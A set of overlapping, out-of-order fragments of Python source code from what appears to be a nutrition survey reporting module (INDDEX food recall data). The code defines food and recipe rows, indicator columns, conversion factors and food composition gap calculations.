"slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a",
"in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in",
"I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR),",
"= 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def",
"hasn't yet been set. It will be \" \"calculated outside the scope of",
"\"food\" case that's a child of this foodrecall. This dataset has a row",
"ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7',",
"elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code]",
"self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used",
"ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else:",
"= ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None",
"slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain,",
"'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients:",
"{name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file docstring",
"See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS",
"case, but don't have a case of their own. Nonstandard recipes are defined",
"= ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM",
"== FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type",
"in the report. Standard recipes have their ingredients enumerated in the \"recipes\" lookup",
"IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'),",
"CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for",
"row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code:",
"the ingredients again. We need to insert duplicates of the previously reported ingredients",
"col in NSR_COLS_TO_COPY: # Copy these values from the recipe case setattr(row, col,",
"data is or isn't available. Some of these foods are recipes, and their",
"Copy these values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete =",
"IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR,",
"from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row",
"from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures",
"I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id',",
"to insert duplicates of the previously reported ingredients into the report for them.",
"_get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe':",
"in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if not",
"col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr",
"ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding to food_code, fall back",
"IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'),",
"\"\"\"These rows aren't part of a recipe, or it wasn't found\"\"\" for raw_row",
"# Copy these values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete",
"as separate rows in the report. Standard recipes have their ingredients enumerated in",
"if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type ==",
"rows are associated with the recipe case, but don't have a case of",
"self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in",
"fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient =",
"FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code ==",
"available. Some of these foods are recipes, and their ingredients appear as separate",
"IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR),",
"i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ]",
"= [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR,",
"bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code =",
"_set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type ==",
"_recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std",
"for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw",
"been set. It will be \" \"calculated outside the scope of FoodRow.\") return",
"= { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections }",
"= ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code",
"= None return res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return",
"their own. Nonstandard recipes are defined by the user and beneficiary during a",
"slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in",
"= { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients:",
"these values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True",
"associated with the recipe case, but don't have a case of their own.",
"# be pulled from the food fixture or from the parent food case's",
".fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER",
"I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE),",
"STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT ingredient cases ingredients",
"dataset. FoodRow :: Class responsible for row-wise calculations and indicator definitions. \"\"\" import",
"indicator definitions. \"\"\" import operator import uuid from collections import defaultdict from functools",
"row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values())",
"v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}}",
"= FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug",
"recipe, or it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures)",
"row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe",
"['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan,",
"# NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor,",
"back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct)",
"res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res",
"rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for row",
"self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code",
"may report eating a nonstandard recipe more than once, in which case subsequent",
"I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type',",
"IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'),",
"dataset has additional rows inserted for each ingredient. These rows are associated with",
"}) @classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request),",
"FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and",
"self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code =",
"IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags): self.slug",
"master_recipe): # nsr references are missing some values, insert them from the master",
"self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code]",
"-------- Beneficiaries are asked about their diet in a \"recall\" session. This results",
"I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated',",
"the user and beneficiary during a recall session. The ingredients of the recipe",
"IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META),",
"row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from the",
"This dataset has additional rows inserted for each ingredient. These rows are associated",
"recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient'",
"I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ]",
"row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures)",
"_set_composition(self): # Get the food composition corresponding to food_code, fall back to base_term_food_code",
"as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import",
"IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR),",
"def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v",
"I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking',",
"self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code =",
"_multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name]",
"IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR),",
"component pieces and presents the result as a unified dataset. FoodRow :: Class",
"v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def",
"a gap type is specified, show only rows with gaps of that type",
"I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR,",
"IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'),",
"IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR,",
"== STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total",
"row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE:",
"= {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in",
"if slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate':",
"self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code",
"are recipes, and their ingredients appear as separate rows in the report. Standard",
"def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or it wasn't",
"I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE),",
"I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units',",
"self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code",
"the result as a unified dataset. FoodRow :: Class responsible for row-wise calculations",
"= _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] =",
"@staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs):",
"I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions',",
"IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR),",
"AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = {",
"diet in a \"recall\" session. This results in a \"foodrecall\" case. Every food",
"self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row",
"self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name):",
"False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False",
"NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE",
"foodrecall. This dataset has a row for every food, with metadata about the",
"don't enumerate the ingredients again. We need to insert duplicates of the previously",
"INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id',",
"= ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if",
"part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows():",
"in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class",
"self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group",
"IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR),",
"the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an indicator",
"self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None for age_range",
"IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding',",
"self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if",
"recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid]",
"to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists",
"not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for",
"have their ingredients enumerated in the \"recipes\" lookup table. This dataset has additional",
"FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used]",
"self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and",
"IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER),",
"self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors()",
"= self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code",
"and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code =",
"parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug]",
"return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for {name}\")",
"in a \"recall\" session. This results in a \"foodrecall\" case. Every food they",
"self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part",
"CALCULATED_LATER in tags # Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS",
"self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from the DB,",
"IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR,",
"= fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code =",
"I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients',",
"it glues together all the component pieces and presents the result as a",
"docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS",
"the interface to this dataset, it glues together all the component pieces and",
"I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER),",
"about their diet in a \"recall\" session. This results in a \"foodrecall\" case.",
"IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR,",
"import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE,",
"for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc =",
"amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not",
"CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR,",
"recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized",
"in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return",
"_calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams",
"ingredients enumerated in the \"recipes\" lookup table. This dataset has additional rows inserted",
"self.ucr_row[indicator.slug] return None else: # If it's an indicator in the UCR that",
"in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res =",
"IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META),",
"I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking',",
"indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates",
"row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row)",
"I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date',",
"\"calculated outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's",
"of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe",
"IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR),",
"= self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and",
"'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: #",
"slug, *tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in tags",
"[], 'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE):",
"IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE),",
"IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR),",
"= 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY:",
"IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR,",
"self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code'",
"that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else",
"as additional food cases and linked to the recipe by `recipe_case_id`. Beneficiaries may",
